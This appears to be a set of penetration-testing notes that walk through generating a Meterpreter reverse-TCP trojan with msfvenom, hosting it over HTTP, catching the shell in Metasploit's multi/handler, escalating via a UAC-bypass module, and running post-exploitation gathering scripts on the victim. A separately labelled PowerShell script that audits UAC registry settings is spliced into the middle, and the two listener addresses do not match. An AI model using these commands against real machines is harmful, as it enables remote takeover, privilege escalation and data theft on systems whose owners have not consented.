Getting a shell with a reverse-connection trojan

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f exe >2020shell.exe

python -m SimpleHTTPServer 8080

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options

set LHOST 192.168.56.102

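UAC (User Account Control)

Requires the user to provide permission or an administrator password before performing an operation that could affect how the computer runs, or an operation that changes settings affecting other users.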

UAC bypass privilege escalation

exploit/windows/local/ask

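Whether and how the UAC prompt described above appears is set by policy values under HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System. The PowerShell audit below is an added example, not part of the original notes; the function name Test-UacPolicy, the baseline it treats as acceptable and the sample values are assumptions of this example.

```powershell
# Added example: audit the UAC policy values that control the elevation prompt.
# The accepted values below are this example's baseline (an assumption),
# not settings taken from the original notes.
$UacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$UacNames = 'EnableLUA', 'ConsentPromptBehaviorAdmin',
            'ConsentPromptBehaviorUser', 'PromptOnSecureDesktop'

function Test-UacPolicy {
    param(
        # Pass a hashtable to evaluate exported settings offline;
        # when omitted, the live registry is read.
        [hashtable]$Policy
    )
    if (-not $Policy) {
        $item = Get-ItemProperty -Path $UacKey
        $Policy = @{}
        foreach ($n in $UacNames) { $Policy[$n] = $item.$n }  # $null if unset
    }
    $checks = @(
        @{ Name = 'EnableLUA'; Ok = @(1)
           Why  = 'UAC is switched off' }
        @{ Name = 'ConsentPromptBehaviorAdmin'; Ok = @(1, 2)
           Why  = 'administrators are not prompted on the secure desktop for every elevation' }
        @{ Name = 'ConsentPromptBehaviorUser'; Ok = @(0, 1)
           Why  = 'standard users get a credential prompt outside the secure desktop' }
        @{ Name = 'PromptOnSecureDesktop'; Ok = @(1)
           Why  = 'the prompt is drawn on the interactive desktop' }
    )
    foreach ($c in $checks) {
        $v = $Policy[$c.Name]
        $pass = ($null -ne $v) -and ($c.Ok -contains $v)
        $shown = '(not set)'
        if ($null -ne $v) { $shown = $v }
        $finding = ''
        if ($null -eq $v) { $finding = 'value not set, OS default applies: review' }
        elseif (-not $pass) { $finding = $c.Why }
        [pscustomobject]@{
            Setting = $c.Name; Value = $shown; Pass = $pass; Finding = $finding
        }
    }
}

# Constructed sample: the out-of-box values of a default Windows install.
$sample = @{ EnableLUA = 1; ConsentPromptBehaviorAdmin = 5
             ConsentPromptBehaviorUser = 3; PromptOnSecureDesktop = 1 }
Test-UacPolicy -Policy $sample | Format-Table -AutoSize
```

Run without -Policy on a Windows host to check the live registry; with the constructed sample, the two ConsentPromptBehavior rows are the ones that fail this baseline.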

run post/windows/gather/forensics/enum_drives // list the target machine's partitions

run post/windows/gather/checkvm // check whether the target is a virtual machine

run scraper // script

run winenum // script
